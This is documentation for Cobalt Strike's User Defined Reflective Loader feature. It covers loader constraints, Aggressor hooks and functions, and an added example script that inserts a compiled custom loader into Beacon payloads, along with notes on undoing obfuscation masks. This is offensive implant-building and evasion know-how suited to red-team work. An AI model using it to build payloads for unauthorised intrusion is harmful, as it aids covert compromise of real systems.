Cobalt Strike 4.4 added support for customized reflective loaders for Beacon payloads, known as User Defined Reflective Loaders (UDRLs). The User Defined Reflective Loader Kit is the source code for the UDRL example. Go to Help -> Arsenal and download the UDRL Kit; your license key is required.
The reflective loader's executable code is the .text section extracted from a user-provided compiled object file. Only that section is taken, so at run time the loader has no .data or .rdata contents and no import table: it must be fully position-independent, keep any strings and constants inline in code or on the stack, and resolve the APIs it needs by itself (for example by walking the PEB to find kernel32.dll and its export table).
The extracted executable code must be less than 5 KB.
Aggressor script hooks are provided to allow implementation of User Defined Reflective Loaders. A hook returns the modified Beacon DLL contents; returning $null tells Cobalt Strike to fall back to its built-in loader.

| Hook | Description |
| --- | --- |
| BEACON_RDLL_GENERATE | Hook used to implement basic Reflective Loader replacement. |
| BEACON_RDLL_GENERATE_LOCAL | Hook used to implement advanced Reflective Loader replacement. Additional arguments provided include the ID of the Beacon the payload is generated for, the GetModuleHandleA address, and the GetProcAddress address. |
Aggressor script functions are provided to extract the Reflective Loader executable code (.text section) from a compiled object file and insert the executable code into the Beacon payload.

| Function | Description |
| --- | --- |
| extract_reflective_loader | Extracts the Reflective Loader executable code from a byte array containing a compiled object file. |
| setup_reflective_loader | Inserts the Reflective Loader executable code into the Beacon payload. |
Aggressor script functions are provided to obtain information about the Beacon payload to assist with custom modifications to the payload.

| Function | Description |
| --- | --- |
| pedump | Returns a map of information about the Beacon payload. The map contents are similar to the output of the "peclone" command with the "dump" argument. |
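The following Aggressor script ties the hooks and functions above together. It is an added example written for this page, not the script shipped in the UDRL Kit. It assumes the compiled loader object files sit next to the script as ReflectiveLoader.x86.o and ReflectiveLoader.x64.o (assumed names), that the hook arguments arrive in the order given in the Aggressor function help ($1 DLL name, $2 DLL contents, $3 architecture, with the Beacon ID and the two API addresses as $4 through $6 for the local hook), and that the loader in the object file resolves its own APIs, so the extra addresses passed to BEACON_RDLL_GENERATE_LOCAL are not needed. build_loader is a local helper name chosen here.

```sleep
# udrl_example.cna - added example, not the UDRL Kit's own script.
# Loads a compiled loader object, checks the documented size limit,
# dumps the payload map from pedump, and inserts the loader.

# Build the payload for one architecture. Returns the modified Beacon DLL,
# or $null so that Cobalt Strike falls back to its built-in loader.
sub build_loader {
   local('$dllname $beacon $arch $path $handle $data $loader $info');
   $dllname = $1;   # e.g. beacon.dll or beacon.x64.dll
   $beacon  = $2;   # Beacon DLL contents as a byte string
   $arch    = $3;   # "x86" or "x64"

   # Assumed file name convention for the compiled object files.
   $path = script_resource("ReflectiveLoader. $+ $arch $+ .o");
   if (!-exists $path) {
      warn("No loader object at $path for $dllname; using the built-in loader");
      return $null;
   }

   # Read the whole object file into memory.
   $handle = openf($path);
   $data   = readb($handle, -1);
   closef($handle);

   # Pull the .text section out of the object file.
   $loader = extract_reflective_loader($data);

   # Enforce the 5 KB limit before touching the payload.
   if (strlen($loader) >= 5120) {
      warn("Loader for $arch is " . strlen($loader) . " bytes; must be under 5120. Using the built-in loader");
      return $null;
   }

   # Inspect the payload before modifying it; the keys mirror "peclone dump" output.
   $info = pedump($beacon);
   foreach $key => $value ($info) {
      warn("$dllname : $key => $value");
   }

   # Insert the extracted loader into the Beacon DLL and hand it back.
   return setup_reflective_loader($beacon, $loader);
}

# Basic hook: DLL name, DLL contents, architecture.
set BEACON_RDLL_GENERATE {
   warn("BEACON_RDLL_GENERATE for $1 ( $+ $3 $+ )");
   return build_loader($1, $2, $3);
}

# Advanced hook: same three arguments plus the Beacon ID ($4) and the
# GetModuleHandleA ($5) and GetProcAddress ($6) addresses. This loader
# resolves its own APIs, so the extra values are only logged here.
set BEACON_RDLL_GENERATE_LOCAL {
   warn("BEACON_RDLL_GENERATE_LOCAL for $1 ( $+ $3 $+ ) from Beacon $4 GetModuleHandleA= $+ $5 GetProcAddress= $+ $6");
   return build_loader($1, $2, $3);
}
```

Load the script from Cobalt Strike -> Script Manager and generate any Beacon payload; the warn() lines appear in the Script Console, and a loader that is missing or oversized leaves the payload on the built-in loader instead of producing a broken artifact.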
Aggressor script functions are provided to perform custom modifications to the Beacon payload.
Depending on the custom modifications made (an obfuscation mask over a section, etc.), the reflective loader may have to reverse those modifications when loading: anything the script masks in the payload file is still masked when the loader runs, so the loader must undo it before that part of Beacon is resolved or executed.

| Function (See the Aggressor Script function help for more information) |
| --- |